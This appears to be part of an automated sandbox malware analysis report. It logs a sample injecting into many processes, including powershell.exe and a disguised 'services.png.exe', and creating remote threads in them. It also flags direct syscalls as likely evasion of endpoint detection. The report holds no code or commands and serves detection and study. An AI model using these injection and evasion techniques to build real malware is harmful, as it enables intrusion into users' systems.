Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C70000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2610000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 6D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1130000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 9D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: B90000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: C10000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 790000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 390000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D20000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2510000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2550000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2460000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29F0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2090000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 20A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C90000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E00000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2280000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3090000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: FE0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2980000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2EC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2DF0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2570000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 31C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2910000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1530000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Users\user\Desktop\services.png.exe base: 2810000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe base: 2320000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe base: 980000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Users\user\AppData\Local\Temp\tmp7e3ae9cd\smbhost.exe base: 740000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Users\user\AppData\Local\Temp\tmpa49210ef\SearchUI.exe base: 410000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2F0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 370000 protect: page execute and read and write	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: 29B01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: 2E501D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: 25501D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: 2E701D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: 24201D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: 25F01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: 2CC01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: CB01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: 2F701D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: 2B501D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: 23B01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: 2CB01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 2A001D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 25001D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 16601D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 2CE01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 23301D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 2A701D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 27401D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 24801D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 27601D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 11D01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 2EC01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 2AE01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 24E01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 2D201D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 2AE01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 31B01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 2A601D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 3B01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 2C801D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 29901D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 2B401D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 28001D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 22301D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 28A01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 12001D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: DC01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 7B01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 26F01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 25A01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 2C601D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 25D01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 2F301D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 7201D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 2C901D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 26301D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 6F01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 11501D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 9F01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: BB01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 26001D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: C301D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 7B01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 3B01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 2D401D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 25001D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 25301D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 25701D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 24801D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 2A101D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 20B01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 20C01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 2CB01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 26C01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 2E201D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 22A01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 26D01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 2CE01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 30B01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 10001D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 29A01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 2EE01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 2E101D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 25901D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 31E01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 29301D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 15501D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 25D01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 28301D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 23401D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 9A01D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Thread created: unknown EIP: 4301D7	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtCreateKey: Direct from: 0x76F02C6C
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtSetInformationThread: Direct from: 0x76F02B4C
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtQuerySystemInformation: Direct from: 0x76F048CC
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtSetInformationFile: Direct from: 0x76F02D0C
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtOpenSection: Direct from: 0x76F02E0C
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtQueryValueKey: Direct from: 0x76F02BEC
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtAddAtomEx: Direct from: 0x76F0312C
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtQueryDirectoryFile: Direct from: 0x76F02DEC
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtQueryDefaultLocale: Direct from: 0x76F02BCC
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtCreateFile: Direct from: 0x76F02FEC
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtOpenFile: Direct from: 0x76F02DCC
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtEnumerateValueKey: Direct from: 0x76F02BAC
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtSetInformationThread: Direct from: 0x76F02ECC
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtQueryInformationToken: Direct from: 0x76F02CAC
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtTerminateThread: Direct from: 0x76F02FCC
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtSetTimerEx: Direct from: 0x76EF7B2E
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtAdjustPrivilegesToken: Direct from: 0x76F02EAC
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtOpenKeyEx: Direct from: 0x76F02B9C
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtSetInformationProcess: Direct from: 0x76F02C5C
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtUnmapViewOfSection: Direct from: 0x76F02D3C
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtCreateMutant: Direct from: 0x76F035CC
